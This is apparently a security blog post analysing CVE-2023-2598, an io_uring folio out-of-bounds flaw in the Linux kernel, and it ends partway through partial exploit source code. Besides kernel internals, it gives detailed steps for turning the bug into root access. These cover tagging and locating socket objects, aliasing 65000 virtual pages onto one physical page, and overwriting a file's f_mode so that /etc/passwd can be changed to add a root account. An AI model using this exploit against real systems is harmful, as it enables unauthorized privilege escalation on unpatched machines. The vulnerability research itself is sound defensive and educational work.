
[Original] CVE-2023-2598 Kernel Privilege Escalation: A Detailed Analysis

Posted: 2025-3-11 18:05




Vulnerability ID: CVE-2023-2598

Affected versions: v6.3 <= Linux kernel < v6.3.2

Affected component: Linux kernel, io_uring (io_sqe_buffer_register) and folio

Impact: local privilege escalation



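Reproduction environment: qemu + Linux kernel v6.3.1

Environment files: mowenroot/Kernel

Reproduction steps: after the exp runs, an account named hacker with root privileges has been added; su hacker completes the escalation.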

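At its core the bug is an out-of-bounds (oob) access to physical memory. The io_uring subsystem provides io_sqe_buffers_register to create a Fixed Buffers region; the region is pinned, cannot be swapped out, and is dedicated to I/O data. As an optimization for buffers backed by several consecutive huge pages, the kernel tries to coalesce the pinned pages, and it does so with the newer folio mechanism. A folio is a set of pages that is contiguous both physically and virtually, but the coalescing code only checks that every page belongs to the same compound page, not that the pages are actually consecutive. If the user passes in the same physical page over and over, the registered buffer has the length of the whole range while its address points at a single page, and accesses through it run past that page into adjacent physical memory.

The techniques involved are io_uring and folio, the successor to compound pages; both are analyzed in detail below.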

References:

CVE-2023-2598 io_uring kernel privilege escalation analysis | CTF导航


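I consulted a lot of material, but the publicly circulated EXPs are all overly complicated and also need the kernel base address to be calibrated, so they are not universal. Here the author instead turns this vulnerability into a stable and powerful "Dirty COW"-style primitive.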



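Linux kernel v5.16 introduced the folio memory-management feature, which aims to address the inefficiency of the traditional struct page when handling memory pages, especially when managing large blocks of memory and the page cache.

In the Linux kernel, physical memory is managed in units of pages, and each page has a corresponding struct page. Traditionally, whether the memory is a 4KB small page or a 2MB huge page (such as a transparent huge page, THP), every 4KB page needs its own struct page instance. In plain terms: no matter how much memory you ask for, it is handed out and tracked 4KB at a time. With little memory activity this goes unnoticed, but with huge pages the overhead of handling every 4KB page individually becomes very large.

Before folio, "compound pages" were used to represent multiple physically contiguous pages. When the GFP flags passed to __alloc_pages include __GFP_COMP, the kernel must combine the allocated pages into a compound page: the first page is called the head page, and all remaining pages are called tail pages.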

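A compound page distinguishes head and tail pages as follows:

(1) Head page: bit 0 of page->compound_head is clear, so _compound_head() resolves the page to itself.

(2) Tail page: bit 0 of page->compound_head is set (this is what PageTail() tests), and the remaining bits hold the address of the head page, so _compound_head() returns compound_head - 1.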
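The head/tail encoding can be modeled in user space. The following is a minimal sketch, not kernel code: struct toy_page and the toy_* helpers are hypothetical names introduced here, and the kernel's fake-head handling is left out.

```c
#include <stdint.h>

/* Hypothetical stand-in for struct page: only the field needed here. */
struct toy_page {
    uintptr_t compound_head; /* tail pages: address of the head page with bit 0 set */
};

/* Mark `tail` as a tail page of `head` by storing head's address tagged with bit 0. */
static void toy_set_tail(struct toy_page *tail, struct toy_page *head)
{
    tail->compound_head = (uintptr_t)head | 1u;
}

/* Non-zero if the page is a tail page (bit 0 of compound_head is set). */
static int toy_page_is_tail(const struct toy_page *page)
{
    return (int)(page->compound_head & 1u);
}

/* Resolve the head page: strip the tag for tail pages, otherwise return the page itself. */
static struct toy_page *toy_compound_head(struct toy_page *page)
{
    if (page->compound_head & 1u)
        return (struct toy_page *)(page->compound_head - 1);
    return page;
}
```

The trick relies on struct alignment: a page descriptor's address always has bit 0 clear, so that bit is free to act as the "I am a tail page" tag.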

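The total number of pages in a compound page is determined by the order used at allocation time: 2^order. For example, order=3 means the compound page contains 8 pages. The order is stored in the compound_order field of the first tail page; compound_order() reads it back, and the total page count follows from it.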
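The arithmetic is small enough to write down. This sketch assumes a 4KB base page; TOY_PAGE_SIZE and both helper names are illustrative, not kernel identifiers.

```c
/* Assumed base page size of 4KB (illustrative constant, not a kernel macro). */
#define TOY_PAGE_SIZE 4096UL

/* Number of base pages in a compound page of the given order: 2^order. */
static unsigned long compound_nr_pages(unsigned int order)
{
    return 1UL << order;
}

/* Size in bytes of a compound page of the given order. */
static unsigned long compound_nr_bytes(unsigned int order)
{
    return TOY_PAGE_SIZE << order;
}
```

For example, order 3 gives 8 pages, and order 9 gives 512 pages, which is the 2MB huge page size mentioned earlier.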

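At this point things may already feel complicated. When one concept is forced on top of another, the result gets messy, and "compound pages" are exactly that. folio, in contrast, is its own struct type, and as a concept it does not get tangled up with page. Linus therefore judged the advantages of folio to be clear: it handles compound pages more directly and avoids a class of confusion, and folio was eventually adopted.

folio is the replacement for the old compound pages. Comparing the basic operations of the two side by side, the folio versions are clearly easier to understand.

The folio mechanism abstracts one or more contiguous physical pages into a logical folio unit, manages single pages and large pages uniformly, and makes memory operations more efficient.

A folio can essentially be seen as a set: a physically contiguous, virtually contiguous run of 2^n * PAGE_SIZE bytes. n can be 0, so a single page is also a folio.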

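Although struct folio is a new type, it is not a brand-new memory layout; it is a wrapper that extends struct page:

A struct page is also embedded inside struct folio.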

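The basics of io_uring were covered in detail in earlier posts; interested readers can refer to those. Only the points relevant to the vulnerability are covered below.

NVD description: A flaw was found in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) in the Linux kernel that allows out-of-bounds access to physical memory beyond the end of the buffer. This flaw enables full local privilege escalation.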



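io_uring_register exposes io_sqe_buffers_register for registering a fixed_buffers region. The region is pinned, cannot be swapped out, and is dedicated to I/O data. Both the size and the address of the pinned region are controlled by the user.

「1」 First, io_buffers_map_alloc allocates the user buffer array for the context (ctx); the size of the array is controlled by the user.

「2」 It then iterates over each ctx->user_bufs[] entry to initialize it. The user's arguments are first copied into the kernel-side iov. The user-controlled iovec has just two fields, {iov_base, iov_len}, so the parameters of the buffer being registered are entirely under user control. io_sqe_buffer_register is then called with iov and &ctx->user_bufs[i] to register the pages of each buffer.

「1」 Inside io_sqe_buffer_register, io_pin_pages() pins the physical pages backing the user-supplied iov for its full length; these pages become the memory shared with io_uring.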



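「2」 Next comes the optimization for runs of huge pages: the kernel tries to coalesce the pages. Coalescing is attempted when nr_pages > 1, and nr_pages depends on the user's iov_len. For example, with iov_len = 50 * PAGE_SIZE the buffer spans 50 pages, so nr_pages == 50 > 1 and coalescing is attempted.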
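How iov_base and iov_len turn into a page count can be sketched as follows. This mirrors my understanding of the usual start/end page arithmetic used when pinning a user range; pages_spanned and the TOY_* constants are hypothetical names, and a 4KB page size is assumed.

```c
#include <stdint.h>

#define TOY_PAGE_SHIFT 12                      /* assumed 4KB pages */
#define TOY_PAGE_SIZE  (1UL << TOY_PAGE_SHIFT)

/* Number of pages touched by the byte range [base, base + len). */
static unsigned long pages_spanned(uint64_t base, uint64_t len)
{
    uint64_t start = base >> TOY_PAGE_SHIFT;                           /* first page index */
    uint64_t end = (base + len + TOY_PAGE_SIZE - 1) >> TOY_PAGE_SHIFT; /* one past the last */
    return (unsigned long)(end - start);
}
```

A page-aligned base with iov_len = 50 * PAGE_SIZE yields 50, matching the example above. A base that is off by one byte with a length of one page yields 2, because the range straddles a page boundary.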

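「3」 This is where the bug lies: the loop that checks whether each page belongs to the same compound page only checks membership in the same folio, not whether the pages are consecutive. As stated when folio was introduced, a folio is a virtually and physically contiguous block of memory. So suppose every page passed in is virtually contiguous but maps to one and the same physical page. On reads and writes the kernel assumes the address and length describe contiguous memory, while in reality the access starts at one fixed physical page and its length is that of the entire registered range.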
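The difference between "same folio" and "same folio and consecutive" can be shown with a small user-space model. This is an illustration only: struct toy_pinned_page, its fields, and both function names are hypothetical, and the stricter variant simply adds the consecutiveness property that the text identifies as missing.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical model of a pinned page: its frame number and the folio it belongs to. */
struct toy_pinned_page {
    unsigned long pfn;
    unsigned long folio_id;
};

/* Models the flawed test: every page only has to belong to the first page's folio. */
static bool coalesce_flawed(const struct toy_pinned_page *pages, size_t n)
{
    for (size_t i = 1; i < n; i++)
        if (pages[i].folio_id != pages[0].folio_id)
            return false;
    return n > 1;
}

/* Stricter variant: same folio AND each frame directly follows the previous one. */
static bool coalesce_checked(const struct toy_pinned_page *pages, size_t n)
{
    for (size_t i = 1; i < n; i++)
        if (pages[i].folio_id != pages[0].folio_id ||
            pages[i].pfn != pages[i - 1].pfn + 1)
            return false;
    return n > 1;
}
```

An array in which every entry is the same frame passes coalesce_flawed but fails coalesce_checked, while a genuinely consecutive run passes both.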

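「4」 Continuing on: if the folio check passes, the references to the other pages are dropped, only the first one (pages[0]) is kept, and nr_pages is set to 1. A struct io_mapped_ubuf *imu with room for nr_pages bvecs is then allocated dynamically. io_buffer_account_pin() accounts the pinned pages against imu, and the iov parameters are stored in imu, with bvec[0] covering the full iov_len starting at pages[0]. imu is handed back through the pointer &ctx->user_bufs[i]; in plain terms, all of these operations act on user_bufs[i], so the user can subsequently do I/O directly against this region.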
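The size of the resulting overrun is simple arithmetic: a single bvec of length iov_len is laid over memory that is really only one page long. A minimal sketch, with bvec_overrun_bytes as a hypothetical helper name:

```c
#include <stdint.h>

/*
 * Bytes by which a segment starting at offset `off` with length `len`
 * extends past a backing region of `backing_bytes` bytes (0 if it fits).
 */
static uint64_t bvec_overrun_bytes(uint64_t backing_bytes, uint64_t off, uint64_t len)
{
    uint64_t end = off + len;
    return end > backing_bytes ? end - backing_bytes : 0;
}
```

With one 4KB page actually backing the buffer and a registered length of 65000 pages, the segment reaches 64999 pages beyond the memory it was supposed to describe.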

Public EXP: ysanatomic/io_uring_LPE-CVE-2023-2598



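That author's technique is to set up socks, locate one of them through the oob, and then hijack its proto to reach CALL_USERMODEHELPER_EXEC for privilege escalation.

The drawbacks are obvious: it depends on the kernel base address, it is not portable, forging subprocess_info is overly complicated, and it can crash.

I modified sock->ops->set_rcvlowat directly, which then caused an error when the work was queued, and I did not bother fixing it further. When I first got this vulnerability, my thought was: since it is an out-of-bounds read/write of physical memory, convert it directly into a dirty_pipe-style attack by tampering with a pipe's flags and then modifying a read-only file. But if the goal is to modify a file anyway, it is simpler to hijack the filp directly. The experiments follow.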

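〔1〕 Initialization: bind to a CPU, set up io_uring, and raise the maximum number of open files (set rlim_cur to rlim_max). nr_memfds is the maximum number of files opened to map the vulnerable physical page; nr_sockets is the maximum number of sockets opened.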
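Raising the soft descriptor limit to the hard limit is an ordinary getrlimit/setrlimit pair. A minimal sketch with error handling; raise_nofile_limit is a name introduced here for illustration:

```c
#include <sys/resource.h>

/*
 * Raise the soft RLIMIT_NOFILE to the hard limit.
 * Returns 0 on success and stores the resulting soft limit in *new_cur
 * (if non-NULL); returns -1 if either call fails.
 */
static int raise_nofile_limit(rlim_t *new_cur)
{
    struct rlimit lim;

    if (getrlimit(RLIMIT_NOFILE, &lim) != 0)
        return -1;
    lim.rlim_cur = lim.rlim_max;   /* an unprivileged process may raise soft up to hard */
    if (setrlimit(RLIMIT_NOFILE, &lim) != 0)
        return -1;
    if (getrlimit(RLIMIT_NOFILE, &lim) != 0)
        return -1;
    if (new_cur)
        *new_cur = lim.rlim_cur;
    return 0;
}
```

The budget of descriptors obtained this way is then split between the different kinds of files the steps below open.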

〔2〕 Create receiver_fd and mmap() the receiver_buffer memory, which holds data (both data read out of bounds and forged data).

〔3〕 Open nr_sockets sockets:

Set sk_pacing_rate / sk_max_pacing_rate == 0xdeadbeefdeadbeef so that the sock is easy to find.
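Why a single SO_MAX_PACING_RATE call leaves the tag in two adjacent fields can be modeled in a few lines. This sketch assumes that both fields start at the maximum unsigned value on a fresh socket and that they sit next to each other in memory; struct toy_sock_rates and the helper names are hypothetical.

```c
#include <stdint.h>

/* Hypothetical model of the two adjacent rate fields of a sock. */
struct toy_sock_rates {
    uint64_t sk_pacing_rate;
    uint64_t sk_max_pacing_rate;
};

/* Models the setsockopt effect: store the new maximum and clamp the current rate to it. */
static void toy_set_max_pacing_rate(struct toy_sock_rates *sk, uint64_t val)
{
    sk->sk_max_pacing_rate = val;
    if (val < sk->sk_pacing_rate)
        sk->sk_pacing_rate = val;
}

/* Non-zero if two consecutive 64-bit words both carry the tag. */
static int toy_has_tag_pair(const uint64_t *words, uint64_t tag)
{
    return words[0] == tag && words[1] == tag;
}
```

Requiring two consecutive matches instead of one makes it much less likely that unrelated data is mistaken for the tagged object.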

The original author uses sk_sndbuf: setting sk->sk_sndbuf = max((fd+4608)*2, 4608) makes it possible to identify the owning fd from the value of sk->sk_sndbuf.



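But sock has a simpler identifier, SO_RCVBUF, which sets the receive buffer size. The kernel stores twice the requested value, so the fd is recovered by halving the stored value and subtracting the fixed offset, without the more involved conversion used by the original author.

With SO_RCVBUF set to 0x20000+fd, sk->sk_rcvbuf becomes (0x20000+fd)*2, and the owning fd can be recovered from the value of sk->sk_rcvbuf.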
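The encoding and decoding of the descriptor number can be sketched as pure functions. The sketch assumes the requested value stays within the range the kernel accepts without clamping (for example below net.core.rmem_max); the three function names are hypothetical, and FIX_ADD_FD is the fixed offset 0x20000 from the text.

```c
#define FIX_ADD_FD 0x20000   /* fixed offset added to the fd */

/* Value to request via SO_RCVBUF for a given fd. */
static int rcvbuf_request_for_fd(int fd)
{
    return FIX_ADD_FD + fd;
}

/* Models what ends up stored in sk_rcvbuf: twice the requested value. */
static int rcvbuf_stored(int requested)
{
    return requested * 2;
}

/* Recover the fd from a stored sk_rcvbuf value. */
static int fd_from_rcvbuf(int stored)
{
    return stored / 2 - FIX_ADD_FD;
}
```

The fixed offset keeps the requested value well above the kernel's minimum receive buffer size, so small descriptor numbers are not rounded up and lost.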

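〔4〕 Open nr_memfds anonymous shared files (memfd_create()) and allocate physical pages for them (fallocate()); this step gives each file its physical backing. The physical addresses obtained here are not sequential. This step is important.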



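〔5〕 Next, map virtual memory for the file: at a fixed address, map 65000 consecutive virtual pages (all bound to that anonymous file) that correspond to only 1 physical page, and register that buffer with io_uring.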
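Mapping many virtual pages onto one physical page is ordinary shared-file aliasing and can be observed on its own. The sketch below uses a handful of pages, reserves the virtual range first instead of choosing a fixed address, and involves no io_uring; alias_one_page is a hypothetical helper name.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Map `nr_aliases` consecutive virtual pages that all refer to offset 0 of a
 * one-page memfd. Returns 1 if a write through the first alias is visible
 * through the last one, 0 if not, -1 on error.
 */
static int alias_one_page(size_t nr_aliases)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    int fd, same;
    char *base;

    if (nr_aliases == 0)
        return -1;
    fd = memfd_create("alias_demo", MFD_CLOEXEC);
    if (fd < 0)
        return -1;
    if (ftruncate(fd, (off_t)page) != 0) {
        close(fd);
        return -1;
    }
    /* Reserve one contiguous virtual range, then overlay it page by page. */
    base = mmap(NULL, nr_aliases * page, PROT_NONE,
                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED) {
        close(fd);
        return -1;
    }
    for (size_t i = 0; i < nr_aliases; i++) {
        if (mmap(base + i * page, page, PROT_READ | PROT_WRITE,
                 MAP_SHARED | MAP_FIXED, fd, 0) == MAP_FAILED) {
            munmap(base, nr_aliases * page);
            close(fd);
            return -1;
        }
    }
    strcpy(base, "hello");                                   /* write via alias 0 */
    same = strcmp(base + (nr_aliases - 1) * page, "hello") == 0;
    munmap(base, nr_aliases * page);
    close(fd);
    return same;
}
```

Calling alias_one_page(4) should report that all four virtual pages show the same contents, which is exactly the "virtually contiguous, physically identical" layout described in this step.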

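〔6〕 Read out of bounds, locate the sock, leak a heap address and the kernel base address, then forge a subprocess_info and overwrite sock.__sk_common.skc_prot so that it leads to CALL_USERMODEHELPER_EXEC.

The author's own approach, in essence, is to change filp->f_mode to make the file writable and then modify /etc/passwd.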

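〔1〕 Initialization: bind to a CPU, set up io_uring, and raise the maximum number of open files (set rlim_cur to rlim_max). nr_memfds is the maximum number of files opened to map the vulnerable physical page; nr_files is the maximum number of files opened.

〔2〕 Create receiver_fd and mmap() the receiver_buffer memory, which holds data (both data read out of bounds and forged data).

〔3〕 Open /etc/passwd nr_files times. Because the files are opened with the O_RDONLY flag, f_mode is always 0x484a801d.

〔4〕 Next, map virtual memory for the file: at a fixed address, map 65000 consecutive virtual pages (all bound to that anonymous file) that correspond to only 1 physical page, and register that buffer with io_uring.

nr_pages comes from the user-supplied iov_len / PAGE_SIZE.

The pages array contains only one distinct address, so the check described earlier is easily bypassed.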

〔5〕 Use the fixed value f_flags+f_mode == 0x484a801d00008000 to locate the file structures, then modify f_mode.
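The combined constant is just the two 32-bit fields read as one 64-bit word. The sketch below assumes a little-endian machine with f_flags stored immediately before f_mode, which is what the combined value in the text implies; file_signature and find_qword are hypothetical helper names.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Combine two adjacent 32-bit fields into the 64-bit word they form in memory. */
static uint64_t file_signature(uint32_t f_flags, uint32_t f_mode)
{
    return ((uint64_t)f_mode << 32) | f_flags;
}

/* Byte offset of the first 8-byte-aligned word equal to `pattern`, or -1 if absent. */
static long find_qword(const void *buf, size_t size, uint64_t pattern)
{
    const unsigned char *p = buf;

    for (size_t off = 0; off + sizeof(pattern) <= size; off += sizeof(pattern)) {
        uint64_t v;
        memcpy(&v, p + off, sizeof(v));   /* avoids alignment and aliasing issues */
        if (v == pattern)
            return (long)off;
    }
    return -1;
}
```

file_signature(0x8000, 0x484a801d) yields 0x484a801d00008000, the value searched for in this step.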

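〔6〕 Because the matching file descriptor is unknown, brute-force a write to every open /etc/passwd descriptor and use the return value to tell whether the write succeeded. In the author's testing this was very stable: wherever the vulnerability is present, privilege escalation succeeds.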

Compound page helpers (head/tail detection and order):

```c
// Resolve the head page
static inline unsigned long _compound_head(const struct page *page)
{
    unsigned long head = READ_ONCE(page->compound_head);

    if (unlikely(head & 1))
        return head - 1;
    return (unsigned long)page_fixed_fake_head(page);
}

// Test whether this is a tail page
static __always_inline int PageTail(struct page *page)
{
    return READ_ONCE(page->compound_head) & 1 || page_is_fake_head(page);
}

// Get the order of a compound page (total pages = 2^order)
static inline unsigned int compound_order(struct page *page)
{
    if (!PageHead(page))
        return 0;
    return page[1].compound_order;
}
```

Compound page vs. folio, basic operations:

```c
// Compound page: allocate and free
struct page *page = alloc_pages(GFP_KERNEL, 2); // allocate 4 pages (order=2)
__free_pages(page, 2);                          // the order must be specified

// Folio: allocate and free
struct folio *folio = folio_alloc(GFP_KERNEL, 2);
folio_put(folio);                               // releases all associated pages

// Compound page: iterate
struct page *page = compound_head(head);
int nr_pages = 1 << compound_order(page);
for (int i = 0; i < nr_pages; i++, page++)
    process_page(page);

// Folio: iterate
struct folio *folio = ...;
for (long i = 0; i < folio_nr_pages(folio); i++)
    process_page(folio_page(folio, i));
```

```c
struct folio {
    struct page page; // embedded page structure
    // other metadata (reference count, flags, and so on)
};
```

io_sqe_buffers_register:

```c
// io_uring/rsrc.c
int io_sqe_buffers_register(struct io_ring_ctx *ctx, void __user *arg,
                            unsigned int nr_args, u64 __user *tags)
{
    struct page *last_hpage = NULL;
    struct io_rsrc_data *data;
    int i, ret;
    struct iovec iov;

    BUILD_BUG_ON(IORING_MAX_REG_BUFFERS >= (1u << 16));

    // Already registered: return
    if (ctx->user_bufs)
        return -EBUSY;
    // Size limit
    if (!nr_args || nr_args > IORING_MAX_REG_BUFFERS)
        return -EINVAL;
    // Initialize the backup node ctx->rsrc_backup_node
    ret = io_rsrc_node_switch_start(ctx);
    if (ret)
        return ret;
    // Allocate io_rsrc_data *data
    ret = io_rsrc_data_alloc(ctx, io_rsrc_buf_put, tags, nr_args, &data);
    if (ret)
        return ret;
    // Allocate the user buffer array ctx->user_bufs
    ret = io_buffers_map_alloc(ctx, nr_args);
    if (ret) {
        io_rsrc_data_free(data);
        return ret;
    }

    // Iterate over each buffer
    for (i = 0; i < nr_args; i++, ctx->nr_user_bufs++) {
        if (arg) {
            // Copy the user's arguments into iov
            ret = io_copy_iov(ctx, &iov, arg, i);
            if (ret)
                break;
            // Validate the iov parameters
            ret = io_buffer_validate(&iov);
            if (ret)
                break;
        } else {
            memset(&iov, 0, sizeof(iov));
        }

        if (!iov.iov_base && *io_get_tag_slot(data, i)) {
            ret = -EINVAL;
            break;
        }

        ret = io_sqe_buffer_register(ctx, &iov, &ctx->user_bufs[i],
                                     &last_hpage);
        if (ret)
            break;
    }

    WARN_ON_ONCE(ctx->buf_data);

    ctx->buf_data = data;
    if (ret)
        __io_sqe_buffers_unregister(ctx);
    else
        io_rsrc_node_switch(ctx, NULL);
    return ret;
}
```

```c
// io_uring/rsrc.c
static int io_buffers_map_alloc(struct io_ring_ctx *ctx, unsigned int nr_args)
{
    ctx->user_bufs = kcalloc(nr_args, sizeof(*ctx->user_bufs), GFP_KERNEL);
    return ctx->user_bufs ? 0 : -ENOMEM;
}
```

io_sqe_buffer_register:

```c
// io_uring/rsrc.c
/*
    @ctx:        io_uring context
    @iov:        I/O vector supplied by user space
    @pimu:       out parameter, returns the mapped kernel buffer descriptor
    @last_hpage: out parameter, returns the last page processed
    Purpose:     register a user-space I/O buffer with the kernel
*/
static int io_sqe_buffer_register(struct io_ring_ctx *ctx, struct iovec *iov,
                                  struct io_mapped_ubuf **pimu,
                                  struct page **last_hpage)
{
    struct io_mapped_ubuf *imu = NULL;
    struct page **pages = NULL;
    unsigned long off;
    size_t size;
    int ret, nr_pages, i;
    struct folio *folio = NULL;
    // folio, the new feature:
    // a physically and virtually contiguous run of 2^n (n >= 0) * PAGE_SIZE bytes

    *pimu = ctx->dummy_ubuf;
    if (!iov->iov_base)
        return 0;

    ret = -ENOMEM;
    // Pin the physical pages to serve as io_uring's shared memory region
    // The length is user-controlled
    pages = io_pin_pages((unsigned long) iov->iov_base, iov->iov_len,
                         &nr_pages);
    if (IS_ERR(pages)) {
        ret = PTR_ERR(pages);
        pages = NULL;
        goto done;
    }

    /* If it's a huge page, try to coalesce them into a single bvec entry */
    // Optimization for runs of huge pages: try to coalesce (compound page -- folio)
    if (nr_pages > 1) {
        folio = page_folio(pages[0]);
        for (i = 1; i < nr_pages; i++) {
            // Bug: only checks membership in the same compound page, not contiguity
            if (page_folio(pages[i]) != folio) {
                folio = NULL;
                break;
            }
        }
        if (folio) {
            /*
             * The pages are bound to the folio, it doesn't
             * actually unpin them but drops all but one reference,
             * which is usually put down by io_buffer_unmap().
             * Note, needs a better helper.
             */
            // Drop the other references, keep only the first (pages[0])
            unpin_user_pages(&pages[1], nr_pages - 1);
            // Compound page, so nr_pages == 1
            nr_pages = 1;
        }
    }

    // Allocate imu with room for nr_pages bvecs
    imu = kvmalloc(struct_size(imu, bvec, nr_pages), GFP_KERNEL);
    if (!imu)
        goto done;

    // Account the pinned pages against the context
    ret = io_buffer_account_pin(ctx, pages, nr_pages, imu, last_hpage);
    if (ret) {
        unpin_user_pages(pages, nr_pages);
        goto done;
    }

    off = (unsigned long) iov->iov_base & ~PAGE_MASK;
    size = iov->iov_len;
    /* store original address for later verification */
    imu->ubuf = (unsigned long) iov->iov_base;
    imu->ubuf_end = imu->ubuf + iov->iov_len;
    imu->nr_bvecs = nr_pages;
    *pimu = imu;
    ret = 0;

    if (folio) {
        // Fill imu->bvec; this corresponds to ctx->user_bufs[i]
        bvec_set_page(&imu->bvec[0], pages[0], size, off);
        goto done;
    }
    for (i = 0; i < nr_pages; i++) {
        size_t vec_len;

        vec_len = min_t(size_t, size, PAGE_SIZE - off);
        bvec_set_page(&imu->bvec[i], pages[i], vec_len, off);
        off = 0;
        size -= vec_len;
    }
done:
    if (ret)
        kvfree(imu);
    kvfree(pages);
    return ret;
}
```

User-side registration, where nr_pages comes from:

```c
uiovec.iov_base = oob_buf;
uiovec.iov_len = nr_pages * PAGE_SIZE;
ret = io_uring_register_buffers(&ring, &uiovec, 1);
```

The check that is bypassed:

```c
folio = page_folio(pages[0]);
for (i = 1; i < nr_pages; i++) {
    // Bug: only checks membership in the same compound page, not contiguity
    if (page_folio(pages[i]) != folio) {
        folio = NULL;
        break;
    }
}
```

```c
if (folio) {
    // Fill imu->bvec; this corresponds to ctx->user_bufs[i]
    bvec_set_page(&imu->bvec[0], pages[0], size, off);
    goto done;
}
```

SO_MAX_PACING_RATE handling in the kernel:

```c
/* net/core/sock.c */
    case SO_MAX_PACING_RATE: /* set the maximum rate limit */
        {
        unsigned long ulval = (val == ~0U) ? ~0UL : (unsigned int)val;

        if (sizeof(ulval) != sizeof(val) &&
            optlen >= sizeof(ulval) &&
            copy_from_sockptr(&ulval, optval, sizeof(ulval))) {
            ret = -EFAULT;
            break;
        }
        if (ulval != ~0UL)
            cmpxchg(&sk->sk_pacing_status,
                    SK_PACING_NONE,
                    SK_PACING_NEEDED);
        sk->sk_max_pacing_rate = ulval;
        sk->sk_pacing_rate = min(sk->sk_pacing_rate, ulval);
        break;
        }
```

Source of the sock-based attempt:

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <liburing.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <mqueue.h>
#include <sys/syscall.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#pragma pack(16)
#define __int64 long long
#define CLOSE printf("\033[0m\n");
#define RED printf("\033[31m");
#define GREEN printf("\033[36m");
#define BLUE printf("\033[34m");
#define YELLOW printf("\033[33m");
#define _QWORD unsigned long
#define _DWORD unsigned int
#define _WORD unsigned short
#define _BYTE unsigned char
#define COLOR_GREEN "\033[32m"
#define COLOR_RED "\033[31m"
#define COLOR_YELLOW "\033[33m"
#define COLOR_BLUE "\033[34m"
#define COLOR_DEFAULT "\033[0m"
#define showAddr(var) dprintf(2, COLOR_GREEN "[*] %s -> %p\n" COLOR_DEFAULT, #var, var);
#define logu(fmt, ...) dprintf(2, "[*] " fmt "\n" , ##__VA_ARGS__)
#define logd(fmt, ...) dprintf(2, COLOR_BLUE "[*] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
#define logi(fmt, ...) dprintf(2, COLOR_GREEN "[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
#define logw(fmt, ...) dprintf(2, COLOR_YELLOW "[!] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
#define loge(fmt, ...) dprintf(2, COLOR_RED "[-] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
#define die(fmt, ...) \
    do { \
        loge(fmt, ##__VA_ARGS__); \
        loge("Exit at line %d", __LINE__); \
        exit(1); \
    } while (0)
#define debug(fmt, ...) \
    do { \
        loge(fmt, ##__VA_ARGS__); \
        loge("debug at line %d", __LINE__); \
        getchar(); \
    } while (0)

#define __ALIGN_MASK(x,mask) (((x)+(mask))&~(mask))
#define ALIGN(x,a) __ALIGN_MASK(x,(typeof(x))(a)-1)
#define L1_CACHE_SHIFT 6
#define sk_buff_size 224
#define SOCK_MIN_SNDBUF 2 * (2048 + ALIGN(sk_buff_size, 1 << L1_CACHE_SHIFT))

size_t raw_vmlinux_base = 0xffffffff81000000;
size_t raw_direct_base=0xffff888000000000;
size_t commit_creds = 0,prepare_kernel_cred = 0;
size_t vmlinux_base = 0;
size_t swapgs_restore_regs_and_return_to_usermode=0;
size_t user_cs, user_ss, user_rflags, user_sp;
size_t init_cred=0;
size_t __ksymtab_commit_creds=0,__ksymtab_prepare_kernel_cred=0;
void bind_cpu(int core);
void binary_dump(char *desc, void *addr, int len);

#define PAGE_SIZE 0x1000
#define SOCKET_TAG 0xdeadbeefdeadbeef
#define VIR_START_ADDR 0xaabbcc0000
#define FIX_ADD_FD 0x20000
#define FAILED ((void*)-1)
#define SET_RCVBUF(x) ((FIX_ADD_FD+x))
#define GET_RCVBUF(x) ((x/2)-FIX_ADD_FD)
#define SUBMIT_READ 0
#define SUBMIT_WRITE 1

void prep_rlimit(int *nr_memfds,int *nr_sockets){
    struct rlimit max_file;
    getrlimit(RLIMIT_NOFILE,&max_file);
    logu("rlim_cur -> %d rlim_max -> %d",max_file.rlim_cur,max_file.rlim_max);
    max_file.rlim_cur=max_file.rlim_max;
    setrlimit(RLIMIT_NOFILE,&max_file);
    int limit = max_file.rlim_max/4;
    *nr_memfds = limit/2;
    *nr_sockets= limit - *nr_memfds;
    logu("nr_memfds -> %d nr_sockets -> %d",*nr_memfds,*nr_sockets);
}

int setup_memfd_physics(char* name,int real_size){
    int fd = memfd_create(name,MFD_CLOEXEC);
    fallocate(fd,0,0,PAGE_SIZE*real_size);
    return fd;
}

int setup_socket(uint64_t TAG){
    int fd;
    if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
        die("socket creating failed");
    // Set sk_pacing_rate / sk_max_pacing_rate so this sock is easy to find
    if (setsockopt(fd, SOL_SOCKET, SO_MAX_PACING_RATE, &TAG, sizeof(uint64_t)) < 0)
        die("setting pacing rate failed");
    // sk->sk_rcvbuf = ((0x20000+fd)*2)
    int rcvbuf = SET_RCVBUF(fd);
    if (setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof(int)) < 0)
        die("failed to set SO_RCVBUF");
    return fd;
}

int leak_sock_addr(void* addr,uint64_t size){
    int ret = -1;
    uint64_t* tmp = (uint64_t* )addr;
    for (size_t i = 0; i < size/8; i++)
    {
        // if( tmp[i] != 0)
        //     logi(" addr: %p offset: 0x%llx -> %p",addr+i,i,tmp[i]);
        if(tmp[i]==SOCKET_TAG){
            logw("successful!! addr: %p offset: 0x%llx -> %p",addr+i*8,i*8,tmp[i]);
            if(ret == FAILED && tmp[i+1]==SOCKET_TAG)
                ret = i*8 -472 + 0x10 ;
        }
    }
    return ret;
}

void memfds_bind_virtual(int fd, int size){
    for (size_t i = 0; i < size; i++)
    {
        if( mmap(VIR_START_ADDR+i*PAGE_SIZE , PAGE_SIZE,PROT_READ|PROT_WRITE,
                 MAP_SHARED|MAP_FIXED,fd,0 )==MAP_FAILED )
            die("failed mmap memfds_buf");
    }
}

void submit_sqe(struct io_uring* ring,int fd,void* buf, unsigned int size,int FLAGS){
